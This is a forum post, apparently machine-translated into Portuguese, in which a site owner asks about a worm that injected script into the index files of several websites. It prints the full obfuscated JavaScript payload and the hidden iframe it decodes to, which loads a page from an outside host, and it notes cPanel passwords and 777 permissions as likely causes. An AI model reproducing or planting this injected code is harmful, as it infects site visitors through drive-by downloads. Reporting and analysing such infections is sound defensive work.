Alguém mais viu essa cultura muito recentemente? Eu tive vários sites com esse erro.
Parse error: syntax error, unexpected '<' in /home/public_html/index.PHP on line 39
É causada por um ataque de worm / injeção que despeja o seguinte código aparentemente de forma aleatória em todos os arquivos index.php / index.html que ele consegue encontrar:
<html><body><script>date=new Date();var ar="Aw'zg>lpNu1m<0]c;erCy,aTnhE={s}i B() :[.\"ofbvdt/";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f108,0,-15,33,-30,6,33,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,-6,12,-75,-54,99,9,-75,3,63,-21,24,0,0,-15,33,-72,12,-33,18,3,48,3,-57,60,0,-18,6,-45,-33,69,-36,45,-12,24,0,0,27,-12,-78,-18,6,18,21,66,-21,-114,51,39,45,-87,51,18,-84,57,33,-72,12,-33,18,45,-9,-33,-9,36,-75,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,90,-93,90,42,3,-63,6,-75,24,9,-33,90,-21,-24,42,-81,63,63,-57,-75,24,9,-33,90,-9,51,-78,-42,33,30,-75,126,-39,-6,6,36,-36,-75,75,45,-78,51,-36,18,42,0,-84,21,-24,-27,102,-36,6,45,-45,30,-51,39,-45,63,-42,36,-105,9,111,-87,-3,-30,33,75,12,-27,-72,9,90,-15,-102,90,-72,9,-42,9,21,105,-48,33,-72,12,-33,18,-36,105,-15,-57,60,0,-18,18,0,18,-99,45,-27,93,-45,30,-51,24,-3,33,-72,12,-33,18,3,48,3,-21,24,0,0,24,-66,-12,42,30,-30,-15,15,39,-12,-78,-18,6,18,21,66,-21,-72,9,-3,15,72,-87,27,-60,33,-18,18,21,66,-36,-96,87,33,-72,12,-33,18,-45,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,81,-33,-9,-39,57,-57,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,99,-57,78,-9,-30,51,-78,-42,33,66,15,-39,-6,6,36,-36,-75,75,45,-78,21,-75,69,18,42,0,-84,21,-66,42,78,-9,-30,51,-78,-42,33,66,-96,102,-36,6,45,-45,30,-51,9,-75,60,63,-42,36,-105,9,111,-87,-45,42,78,-9,-30,51,-78,-42,33,66,-99,33,75,12,-57,-75,33,-33,42,78,-9,-30,51,-78,-42,33,66,21,-15,-102,60,-75,33,-33,42,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,-3,90,42,3,-63,-69,57,-57,24,9,-33,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,69,-24,42,-81,63,63,-132,57,-57,24,9,-33,99,-57,60,0,0,27,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,-6,12,-75,-54,99,9,-75,3,75,-51,-45,0,30,21,63,-78,18,18,-75,117,-33,24,-21,-57,60,0,-18]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}e(s);</script></body></html>
O código insere cegamente um iFrame de origem javascript:
<iframe height="10" width="10" src="http://counterstats.cz.cc/counter.htm"style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;"></iframe>
Eu tentei separar o site para ver como isso aconteceu, mas alguém sabe qual ataque específico é esse e como ele se propaga? É um código sem correção, o próprio CPanel, senhas quebradas, um servidor enraizado?
EDITAR
Eu não consegui identificar exatamente o que está acontecendo aqui, mas parece que é uma coisa do CPanel - mudar todas as senhas no CPanel parece impedir ataques repetidos. Eu deixei um site sem importância neste estado (sem limpar o código do site) e tem sido absolutamente bem visto que antes ele estava sendo corrompido diariamente. Contactado UK2.net e JustHost sobre isso, mas até agora nenhuma resposta.
Parece também que a pasta public_html e algumas das outras pastas do "sistema" foram chmod'd estranhamente - muitas 777 onde não deveria haver. Mais uma vez nenhuma resposta dos anfitriões sobre isso até agora.
EDITAR
Parece ser "Trojan.JS.Agent.bur" Tentando descobrir mais ...